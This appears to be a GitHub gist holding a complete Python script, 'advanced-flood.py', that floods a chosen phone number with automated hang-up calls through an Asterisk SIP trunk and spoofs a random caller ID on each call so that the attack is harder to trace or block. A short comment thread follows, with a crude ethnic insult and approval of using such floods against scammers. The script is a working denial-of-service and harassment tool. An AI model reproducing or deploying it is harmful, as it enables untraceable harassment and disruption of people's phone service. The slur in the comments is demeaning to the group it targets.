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#!/usr/bin/python
"""
advanced-flood.py
@author: Randall Degges
@email: [email protected]
@date: 11-20-09
This program floods the specified phone number and spoofs caller ID making it
much harder to trace / prevent.
"""
from time import sleep
from sys import argv, exit
from pycall.callfile import *
from random import seed, randint
def genid():
"""
Generate a random 10-digit US telephone number for spoofing to.
"""
return str(randint(1000000000, 9999999999))
def call(num, cid):
"""
Create a call to the specified number which does nothing except hang up.
Also spoofs caller ID to a random 10 digit number.
"""
testcall = CallFile(
trunk_type = 'SIP',
trunk_name = 'flowroute',
callerid_num = cid,
number = num,
application = 'Hangup',
data = ' ',
user = 'asterisk'
)
testcall.run()
def main():
"""
Control the application logic.
"""
seed() # seed the random number generator
if len(argv) < 3:
print 'Usage: %s [number] [calls-per-minute]' % argv[0]
exit(1)
number = argv[1]
try:
cpm = int(argv[2])
except ValueError:
cpm = 1
print 'Starting call flood on target: %s. Placing %d calls per minute.' % (number, cpm)
count = 1
while True:
for x in xrange(cpm):
cid = genid()
print 'Placing call %d using caller ID %s...' % (count, cid)
call(number, cid)
count = count + 1
sleep(60)
if __name__ == '__main__':
"""
Program execution begins here.
"""
main()
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dop3st commented May 10, 2023

For the same reason vigilantism is illegal (murdering criminals). What is evil and who gets to decide? Would you wreck a family's phone line or internet because their 10 year old son said something in anger at you? Some people would.

tell this shit to your grandma after she's getting scammed by some indian mofo

hows grandma these days

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